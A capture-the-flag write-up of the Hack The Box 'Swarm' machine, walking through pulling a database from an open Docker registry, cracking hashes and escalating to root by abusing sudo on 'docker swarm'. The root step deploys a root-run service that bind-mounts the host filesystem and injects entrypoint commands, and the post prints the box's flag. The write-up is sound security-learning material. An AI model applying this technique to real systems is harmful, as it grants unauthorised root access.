Intro
Business CTF featured a fullpwn category, which was 5 boxes of varying difficulty where you need to get initial access and escalate privileges to root. However, one of the easy ones, Swarm, had a premise for privilege escalation that you rarely get to see with CTF machines. GTFOBins is well known for documenting ways to escalate privileges with sudo or SUID permissions, but what if you had sudo on something that wasn’t documented? What would you do?
Though it’s much harder to communicate trial and error in text, the purpose of this blog is to highlight the research and struggle to figure out how to escalate privileges only using docker swarm
, which, at the time of writing, wasn’t explained at all (but 100% possible if you just read how Docker swarm worked).
Context
The nmap scan looks like this:
The box has a Docker registry hosted on port 5000/tcp (i.e. like a locally hosted Git server but for Docker) with one image on it. Since it’s unauthenticated, we can pull down the image and inspect it to find a database in there containing hashes that we can crack. One set of credentials gives us local access as plessing
.
Difficulty is relative, but the foothold wasn’t too difficult. In fact, finding where the privilege escalation isn’t too hard either.
We can run docker swarm
with root permissions! This must be easy to do! Just copy and paste something from GTFOBins, call it a day, right?
Oh. Well surely someone has just written about this right?
Well then.
All of these links are the standard Docker breakouts/privescs, but nothing about Docker Swarm. Looks like we have to figure this out ourselves.
What even is Docker Swarm anyway?
I wrote a pretty long post giving an intro to Docker back in 2022, but I never touched on Docker Swarm, mainly because I never had a use for it. However, since we need to figure out how to abuse this, there’s no better place to learn than the original docs (most of the time, at least). Per Docker documentation:
A swarm consists of multiple Docker hosts which run in Swarm mode and act as managers, to manage membership and delegation, and workers, which run swarm services. A given Docker host can be a manager, a worker, or perform both roles.
If Docker Compose is a way to orchestrate multiple containers on the same engine, then Swarm is a similar thing, except we’re now orchestrating Docker Engines on different hosts. The purpose makes sense- if you have containers deployed on a single host, there’s a certain point where that needs to be distributed in some way. From an attacker’s perspective, then, having sudo privileges to this is extremely lucrative. Just because a privilege escalation isn’t documented means it’s not possible, we just have to dig for it, especially knowing the number of ways a normal Docker engine can let you escalate privileges.
Understanding Command Line Features
We can use the command line to get a sense of how Docker Swarm works. On the compromised box:
Without being connected to a swarm, we can either start a new swarm, or join one (either as a manager or a node). Let’s see what options we have if we started a swarm:
There’s a lot of options here, which might be hard to process, but we can narrow down what may or may not be worth looking at based on our goals to escalate access.
- Arbitrary File Read - With arbitrary file read, we would be able to read
/root/root.txt
, but more practically, we could read/etc/shadow
or any SSH keys that the root user might have. - Arbitrary File Write - With arbitrary file write, we could insert a new root user in
/etc/passwd
or/etc/shadow
, or override some other file that’s being executed as root. - Command Execution - Self-explanatory, if the goal is to run commands as root, command execution would give us execution as root.
There are likely other ways you can come up with, but with these three umbrella goals can help us realize that at the very least, the logic of any of these flags will not help us. All of these alter something about the swarm configuration that don’t advance us closer to our goal. We can check to see if --external-ca
reads from a file, as programs will often error out by printing the contents of the file, but it unfortunately does not.
The docker swarm init
command also doesn’t give us too much to look at.
The Swarm Rises
Docker Swarm works by having a nodes join a manager, and the manager decides what the nodes do, so let’s try setting that up. Knowing that the manager controls nodes, and the nodes are ultimately running Docker containers, I want to try having my box be the manager and the victim box be the node. On my machine, I’ll initialize the swarm, specifying the address to listen on because I’m on the VPN.
By copying and pasting the command into the victim machine, it connects back to my swarm, which it’s only able to do since we have sudo access.
Attempting to Execute Code - Fail
Now the question is how to do anything to our new node. The documentation’s quickstart guide gives the following example for deploying a new service:
Cool! So all we have to do is copy and paste this into our box, changing docker.com
to 10.10.14.17
because HTB machines don’t have internet access. Running docker service ls
confirms that this is up.
The docs tell us we can also inspect services with the ID, and also see what nodes are running the service.
Everything looks good until we run the service ps
command. Although our host is the manager and we want the node to be the one running the container, the node actually has no way to pull that image, because, as we mentioned earlier, it isn’t internet connected. As a result, my best guess is that Docker defaults to whatever host is most convenient to deploy the service on.
It’s at this point that I tried to experiment with setting both machines to “manager” to see if some execution was possible, and from my light testing, I couldn’t make anything happen. I would include this tangent here, but to be quite honest, it wouldn’t add much since I just lost sight of what the goal was. Setting both machines to manager might add some more things to configure for swarm, but I should have realized that swarm is another way to control Docker. That’s it. Normally, access to docker
lets you escalate privileges, so let’s focus up and just go after this.
Putting the Pieces Together
So we’ve identified a few problems we need to solve:
- We need the node to be able to access a Docker image to run (and force it onto the
swarm
hostname and not ours) - We need to figure out a way to execute code in the container
- (maybe 2a) We need to set up the container so we can escalate privileges
Answering question 1 isn’t too bad, some Googling returns this blog which has the following example:
We can reuse the registry that’s already on the box to import the newsbox-web
image.
Note: I later learned that the unauthenticated access to the registry included push access, so we literally could have just used our own custom image. We could have thrown OWASP Juice Shop on there if we really wanted to.
Additionally, this Stack Overflow post mentions the --constraint
flag, which allows us to restrict service creation to servers with specific attributes.
So, the service we want to create looks like this so far:
We can run this to confirm that it runs on the target box.
Okay, now things are starting to make sense. We now have to deal with the question of code execution and privilege escalation. If we return to documentation once more, this time looking at the information from the --help
flag, a few flags stand out:
--entrypoint
- This will override the entrypoint of the Docker container (i.e. the very first process that runs in the container), which will let us insert commands-u
- This sets the user that’s running in the container, which we can set to root, because obviously-t
- This will allocate a pseudo-TTY, which will be useful if we want to get shell access to the container--mount
- This will be the key to our privilege escalation. If we can mount the root of the filesystem (/
) in the container, and we’re already root inside the container, we have full control over the file system, which we can use to read any SSH keys the root user has, or just the root flag.
Before coming to the mount idea, I was trying to figure out how to execute commands within a Docker container/service from a manager node, but it just seems like it’s not a feature that’s enabled (which, again, takes trial and error). Coming back to the main point, we can view documentation for using mounts with services here.
Bind mounts are file system paths from the host where the scheduler deploys the container for the task. Docker mounts the path into the container. The file system path must exist before the swarm initializes the container for the task.
The following example is given for a read-write bind:
There’s some warnings about using bind mounts, but since we’re only working with the one system, we shouldn’t have any problems. All the details in place now, our command becomes this:
Breaking down all of the new additions:
- The
--mount type=bind...
mounts/
from the host into a new directory called/host
in the container. Any changes to the files in that mount will be reflected on the host and vice versa. -u root
ensures we’re running with enough privileges in the container to read/modify files we want--entrypoint
gets a little funky. From my testing, we can’t just call some bash commands and call it a day, because then the container will just exit (at least, that’s what happened to me). After inspectingnewsbox-web
’s Dockerfile, the entrypoint to that container ispython manage.py runserver 0.0.0.0:8000
. To keep that intact, we essentially inject commands before that Python is called to copy the mounted/root
directory to a new directory that is world-modifiable called/freedom
.
Running it from my attacking host, it loads successfully after waiting 5 seconds to confirm stability.
And if I check the worker node, we see a new “freedom” directory:
And there we have the flag:
flag: HTB{5tunG_bY_th3_5w4rm}
Overall, this box’s “Easy” rating was, in my opinion, was perfect. The box’s premise was simple, the research was not obscure, but you could not proceed without taking the time to pause and think about what’s actually happening. This writeup was very geared towards beginners, and I hope it sheds some more light on the process of coming up with these attacks, because people are rarely popping shells on the first try all of the time.
”Alternative” Solutions
Docker is an ecosystem for a lot of shenanigans, so naturally there’s multiple ways to achieve similar goals.
Box Author’s Solution
C4rm3l0, the box author, put out their solution here, which was ultimately very similar to mine, except they created and pushed a new image to the registry. They also started the swarm on the swarm
box instead of their attacking machine, which worked out similarly.
Using A VPS
lordrukie on Discord mentioned having issues with using swarm on their Mac machine.
Their solution was to spin up a VPS, and created a Docker compose file to deploy the stack automatically.